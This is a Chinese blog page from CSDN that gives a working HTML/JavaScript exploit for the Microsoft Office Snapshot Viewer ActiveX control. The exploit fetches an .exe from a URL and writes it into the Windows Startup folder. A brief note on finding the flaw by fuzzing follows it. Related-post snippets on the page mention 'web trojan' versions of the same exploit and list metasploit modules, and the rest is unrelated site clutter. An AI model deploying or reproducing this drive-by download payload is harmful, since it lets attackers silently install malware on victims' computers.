Microsoft Office Snapshot Viewer ActiveX Exploit

最新推荐文章于 2024-08-25 17:25:35 发布
最新推荐文章于 2024-08-25 17:25:35 发布
阅读量845 收藏
点赞数
文章标签: microsoft office 测试 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/2654027
版权
  Snapshot Viewer的ADV,结合CERT那篇dranzer.pdf,重现漏洞

EXP:

<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
var buf1 = 'http://127.0.0.1/a.exe';
var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe';
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>

Fuzzing时一般是对单个Property和单个Method()做FUZZ,这时会检测到对SnapshotPath有HTTP GET。然后想想它总是需要保存到本地的,再测试其他Property。由于此ActiveX的Property和Method都非常少,很快可以 FUZZ完
iiprogram
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Snapshot Viewer报表快照97
12-02
其实2000是带有这个工具的啦,但ACCESS97是没有这个工具的,你可以从这里下载<P> 创建报表快照后,用户即可单独发布生成的快照文件。使用Snapshot ViewerMicrosoft Access可以通过电子邮件传送报表快照  
stackage-snapshots:LTS Haskell和Stackage Nightly快照配置(实验性,用于食品储藏室)
02-09
堆叠快照 LTS Haskell和每晚的Stackage快照配置(实验性,适用于食品储藏室)
MS Office Snapshot Viewer ActiveX Exploit
07-16 826
 影响系统: Microsoft Access 2003Microsoft Access 2002Microsoft Access 2000Microsoft Snapshot Viewer 10.0.4622详细:受到影响的产品主要是Microsoft Access2003以及之前的版本,或者安装了Microsoft Snapshot Viewer 的系统都可能遭受攻击.Microsoft
Access很好用的报表快照Snapshot View(snp文件)
VB.Net+Android.java
03-03 4007
Access写数据库程序,还是蛮有用的。快捷、方便,容易上手。报表快照文件Snapshot View.snp
MS Office Snapshot Viewer ActiveX Exploit (可执行版)
weixin_30879833的博客
07-21 104
可执行版,请勿用于非法用途。 <script type="text/javascript"> function killErrors() { return true; } window.onerror = killErrors; var x; var obj; var mycars = new Array(); mycars[0] = "c:/Program Fi...
MS Office Snapshot Viewer ActiveX Exploit 最新网马
07-16 868
 经本站焦点核(X)安全技术咨询站测试 确实可以执行 被360拦截 微软尚未发布补丁可执行版,请勿用于非法用途。function killErrors() {return true;}window.onerror = killErrors;var x;var obj;var mycars = new Array();mycars[0] = "c:/Program Files/Outlook
metasploit--exploit模块信息
weixin_30808253的博客
12-21 1608
Name Disclosure Date Rank Description ---- --------------- ---- ----------- aix/rpc_cmsd_opcode2...
metasploit-学习8--显示exploit的模块的所有exploit信息
热门推荐
简单就是美
06-19 2万+
Name                                             Disclosure Date  Rank    Description    ----                                             ---------------  ----    -----------    aix/rpc_cmsd_opcod
gcviewer-1.36-SNAPSHOT
09-16
gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-...
gcviewer-1.36-SNAPSHOT.jar
03-15
gcviewer-1.36-SNAPSHOT.jar 主要是jvm 内存垃圾回收 界面图示展示分析 非常好的一筐工具
gcviewer-1.37-SNAPSHOT.jar|gcviewer-1.37-SNAPSHOT.jar
10-16
GC日志可视化分析工具GCviewer。通过GC日志可视化分析工具,我们可以很方便的看到JVM各个分代的内存使用情况、垃圾回收次数、垃圾回收的原因、垃圾回收占用的时间、吞吐量等,这些指标在我们进行JVM调优的时候是很...
[指南]微软发布Windows-Linux双系统无法启动的完整修复方案
最新发布
weixin_41446370的博客
08-25 135
早前微软发布的 2024-08 例行安全更新导致 Windows-Linux 双系统无法启动引起关注,该问题实际上在 7 月份微软已经发现并且添加到已知问题列表中,但可能很多用户没注意结果安装更新后 Linux 系统无法正常启动。但这个问题也不是影响所有 Linux 系统,对于较新的 Linux 系统不受影响,如果用户使用的版本比较老旧则会出现无法启动,现在微软也发布了详细的解决方案。在禁用安全启动后用户可以进入 Linux 系统,此时重启系统进入 Linux 并打开终端管理器并执行如下命令。
QDialog中的不同模式
淘气の小狼人的博客
08-24 211
QDialog的不同用法
OS-Copilot:自学习的通用计算机智能体
人工智能前沿分享
08-21 1206
人工智能咨询培训老师叶梓 转载标明出处现有的计算机智能体大多局限于特定应用或领域,难以应对多样化和不断变化的计算机操作需求。这种局限性不仅限制了智能体的实用性,也阻碍了其在更广泛场景中的应用潜力。为了突破这一瓶颈,研究者们一直在探索如何构建能够处理更广泛任务的通用计算机智能体。来自上海人工智能实验室、华东师范大学、普林斯顿大学和香港大学的研究团队提出了一种名为OS-Copilot的创新框架,它旨在实现可自我完善的通用计算机智能体。
微软正式确认将在近期关闭经典Windows控制面板
weixin_41446370的博客
08-22 852
在新的支持页面上,我们详细介绍了各种原生 Windows 配置工具,在这篇专门文章中,微软终于声明控制面板"正在被淘汰,取而代之的是设置应用"。提示:虽然出于兼容性考虑,控制面板仍然存在,并且可以访问某些尚未迁移的设置,但我们建议您尽可能使用"设置"应用程序。与微软似乎希望尽早取消的"3D 画图"功能类似,Windows"控制面板"也是这家科技巨头一直希望取消的功能。控制面板正在被淘汰,取而代之的是"设置"应用程序,它提供了更现代、更简化的体验。此外,该公司还补充说,旧版应用程序的存在有一定的兼容性原因。
Spring Cloud Consul面试题
yang_xs的博客
08-22 965
Spring Cloud Consul 是微服务架构中的一个重要组件,用于服务发现、配置管理以及健康检查。了解 Spring Cloud Consul 的工作原理和应用场景,对于微服务开发者和架构师来说至关重要。以下是一些常见的 Spring Cloud Consul 面试问题及其详细解答,旨在帮助你更好地准备相关面试。Spring Cloud Consul 是 Spring Cloud 提供的一个集成模块,它基于 HashiCorp 的 Consul 系统,主要用于微服务架构中的服务发现和配置管理。
什么是d3dx9_42.dll?如何将丢失的d3dx9_42.dll进行修复呢?
电脑修复君的博客
08-24 924
d3dx9_42.dll文件丢失什么情况?如何将丢失的d3dx9_42.dll进行修复呢?d3dx9_42.dll又是什么文件?d3dx9_42.dll 文件是一个由 Microsoft Corporation 开发的部分,属于 Microsoft DirectX for Windows 的一组庞大库集合中的一个。DirectX 是专为高性能游戏和其他图形密集型程序而设计的一系列应用程序接口(APIs),d3dx9_42.dll提供了一种与硬件设备直接交互的方法,尤其是图形和声音相关的硬件。
C++ 设计模式——外观模式
qq_68194402的博客
08-22 1129
外观模式(Facade Pattern)是一种结构性设计模式,它为复杂的子系统提供一个简单的接口。通过外观模式,客户端通过外观类与子系统进行交互,外观类将客户端的请求委托给适当的子系统对象,从而实现功能的调用。这样的设计隐藏了子系统的复杂性,使得客户端与子系统之间的耦合度降低。
java -jar gcviewer-1.36-snapshot.jar
11-26
java -jar gcviewer-1.36-snapshot.jar是一个用于分析Java虚拟机垃圾回收日志的工具。通过在命令行中输入该命令,可以运行gcviewer-1.36-snapshot.jar文件,打开相应的图形界面界面以分析垃圾回收日志。该工具可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值